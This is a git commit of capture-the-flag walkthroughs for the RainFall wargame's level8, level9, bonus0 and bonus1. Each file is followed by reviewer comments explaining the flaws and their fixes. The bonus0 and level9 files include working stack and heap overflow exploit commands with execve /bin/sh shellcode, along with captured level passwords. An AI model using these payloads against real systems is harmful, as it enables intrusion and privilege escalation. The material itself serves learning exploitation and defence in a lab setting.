chore: walkthrough for level8 through bonus1

gbrochar 2025-05-20 10:21:51 +02:00
parent 0673f48aa5
commit 183947e401
4 changed files with 112 additions and 0 deletions


@ -0,0 +1,61 @@
The program segfault when 2nd string is 20 char longs
```
Starting program: /home/user/bonus0/bonus0
-
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
-
AAAABBBBCXXXXDDDEEEE
aaaaaaaaaaaaaaaaaaaaAAAABBBBCXXXXDDDEEEE<EFBFBD><EFBFBD><EFBFBD> AAAABBBBCXXXXDDDEEEE<45><45><EFBFBD>
Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
```
we need to find where our 'a's are stored in the stack, each call to p reads so we will stop after the 1st and proceed to do a search.
It doesn't work, only thing we can find are a string of 20 'a's near eax.
We can see there is a strcpy just after both calls to p, and p writes to the same address, so maybe we can do something with that, considering the second string will override the first.
Still doesn't work, maybe check read's return in p function ?
Got it at 0xbfffe680, let's leave the function and check if the data's still there
during second read call, we see our data is still there, but the beginning have been override by our second string. Maybe we can ditch the first string entirely ?
let's try putting our shell code 3 characters after the 'X's and replace the 'X's with 0xbfffe690
```
bonus0@RainFall:~$ python -c "print('A'*9+'\x90\xe6\xff\xbf+'A'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')" > test.txt
File "<string>", line 1
print('A'*9+'\x90\xe6\xff\xbf+'A'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')
^
SyntaxError: invalid syntax
bonus0@RainFall:~$ python -c "print('A'*9+'\x90\xe6\xff\xbf'+'A'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')" > test.txt
bonus0@RainFall:~$ echo "a" > 1.txt
bonus0@RainFall:~$ (cat 1.txt ; cat test.txt ; cat) | /home/user/bonus0/bonus0
-
-
a AAAAAAAAA<41><41><EFBFBD><EFBFBD>AAA1<41><31>F<EFBFBD><46><EFBFBD>
whoami
bonus0@RainFall:~$
```
It's doesn't work with an empty first file, let's just put it twice so we don't have to worry about strings overriding or something.
Notice we use the full path of the binary to avoid the need for a NOP slide.
```
bonus0@RainFall:~$ (cat test.txt ; cat test.txt ; cat) | /home/user/bonus0/bonus0
-
-
AAAAAAAAA<EFBFBD><EFBFBD><EFBFBD><EFBFBD>AAA1<EFBFBD><EFBFBD>FAAAAAAAAA<EFBFBD><EFBFBD><EFBFBD><EFBFBD>AAA1<EFBFBD><EFBFBD>F<EFBFBD><EFBFBD><EFBFBD> AAAAAAAAA<41><41><EFBFBD><EFBFBD>AAA1<41><31>F<EFBFBD><46><EFBFBD>
whoami
bonus1
cat /home/user/bonus1/.pass
cd1f77a585965341c37a1774a1d1686326e1fc53aaa5459c840409d4d06523c9
```
:)
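Review bot: the walkthrough never states which bytes of the 20-character second string landed in eip, and that is the fact the final payload depends on. The crash shows `0x58585858 in ?? ()` for the input `AAAABBBBCXXXXDDDEEEE`, so the four `X` bytes at positions 10 through 13 are what overwrote the saved return address, and that is why the working command puts the address right after `'A'*9`; one sentence saying so would let a reader verify the offset instead of inferring it from the python line. Two smaller points: the first python command fails only because the closing quote after `\xbf` is missing (the next command has it), so either drop the failed attempt or say what was wrong; and the remark about using the full path `/home/user/bonus0/bonus0` should give the reason: the address 0xbfffe690 was read in gdb, which started the binary by that exact path, and because argv[0] is stored on the stack, running the binary under a different path shifts the stack and the hardcoded address would no longer point into the data. From a defensive reading, the note should name the root cause the session demonstrates: `p` accepts a line far longer than the destination it ends up in (64 `a` characters were accepted without complaint), and the strcpy that follows both calls copies without a length check, which is why a 20-character line reaches the return address.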


@ -0,0 +1,5 @@
We can see using ghidra that we need the first number to be less than 10, but then we need it to be equal to 0x574f4c46, so we will have to change it and the only way to do that is by using the memcpy between the two conditional statements.
But the memcpy uses the result of atoi * 4 for the size of the cpy. But atoi result should be negative.
We will use c's wrapping overflow behavior for this problem, and memcpy will override the atoi result position with the desired number.
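Review bot: this file stops before the working input; unlike the other three it records neither the number passed to atoi nor the final command, so the walkthrough cannot be reproduced or checked. Record the value used and the resulting session, and tie the two sentences together: the first check requires a value below 10, the copy length is that value times 4, and the plan only works if the product wraps to a small positive count that reaches the stored atoi result so it can be replaced with 0x574f4c46. The phrase "c's wrapping overflow behavior" is also imprecise and worth correcting in a security write-up: signed integer overflow is undefined behaviour in C, and what is being relied on is the two's-complement wrap the compiled code happens to produce. That distinction is the defensive lesson of the level, since validating the value's range before the multiply, or checking the product against the destination size, would have closed the bug.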


@ -0,0 +1,2 @@
For this level, using ghidra we can see that there is a conditional statement that will open a shell. We need the 9th character of the string auth to be different than 0. We can overflow the buffer by adding trailing characters to the service prompt after the auth command.
We can also input the service command twice in a row to do that.
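Review bot: the condition is asserted ("the 9th character of the string auth") but never shown, and the two suggested inputs are given without saying why either one changes what the check sees. Quote the decompiled condition from ghidra, and state which buffer is being overflowed and how its size relates to the offset being tested; as written a reader cannot tell whether the trailing characters on the service input are written into auth, or whether the check reads past the bytes that were actually written to auth into whatever the service input placed next to it. Also say which of the two methods was used to obtain the password and include the session, as the other files in this commit do. One defensive sentence would round the note off: the shell is gated on a byte at an index the auth command never initialises, so the fix is to bound that index to auth's allocated size or to initialise the whole object.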


@ -0,0 +1,44 @@
For the last level of the mandatory part, we notice there is a twist, as the binary seems to be a cpp code. We don't seem to see any shell or pass reading so we are going to use a shellcode.
Let's try to make the program segfault with 'A's it segfault from 109, if we put 112 in gdb with 'B's at the end, we get this segfault
```
(gdb) i r
eax 0x42424242 1111638594
ecx 0x42424242 1111638594
edx 0x804a07c 134520956
ebx 0x804a078 134520952
esp 0xbffff6a0 0xbffff6a0
ebp 0xbffff6c8 0xbffff6c8
esi 0x0 0
edi 0x0 0
eip 0x8048682 0x8048682 <main+142>
eflags 0x210287 [ CF PF SF IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) x/i $eip
=> 0x8048682 <main+142>: mov (%eax),%edx
(gdb)
```
later in the code, we got this
```0x8048693 <main+159> call *%edx```
That means we can put the target address we want to jump to at any point in the string, and put the adress of this at the 109-112 bytes.
We will target our shellcode with it.
```
level9@RainFall:~$ ./level9 `python -c "print('\x10\xa0\x04\x08'+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'A'*58+'\x0c\xa0\x04\x08')"`
$ whoami
bonus0
$ cat /home/user/bonus0/.pass
f3f0004b6f364cb5a4147e9ef827fa922a4861408845c26b6971ad770d906728
```
:)
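Review bot: "we can put the target address we want to jump to at any point in the string" misstates what the payload does, and the role of the last four bytes is not explained. The register dump shows eax = 0x42424242 at `mov (%eax),%edx`, so the bytes at offsets 109-112 overwrite a pointer that is dereferenced, and the value loaded from it is what `call *%edx` later uses. The working payload therefore carries two addresses, not one: the trailing `\x0c\xa0\x04\x08` points back at the start of the string, so the dereference reads the string's first four bytes, and the leading `\x10\xa0\x04\x08` is the address of the shellcode that begins four bytes further on. Spell that out, and say where 0x0804a00c came from, because it does not appear in the gdb output above (ebx = 0x804a078 and edx = 0x804a07c are the only nearby addresses shown). `'A'*58` is also a magic number: 4 + 46 bytes of shellcode + 58 = 108, the offset at which the text says the crash begins (109 counted from 1), so writing the padding as an expression of the shellcode length documents the layout and survives a change of shellcode. Defensive reading for the note: an unbounded copy into an object member overruns into an adjacent pointer field that is later dereferenced and called, the same missing length check as in the earlier levels, now with a C++ object layout deciding what sits after the buffer.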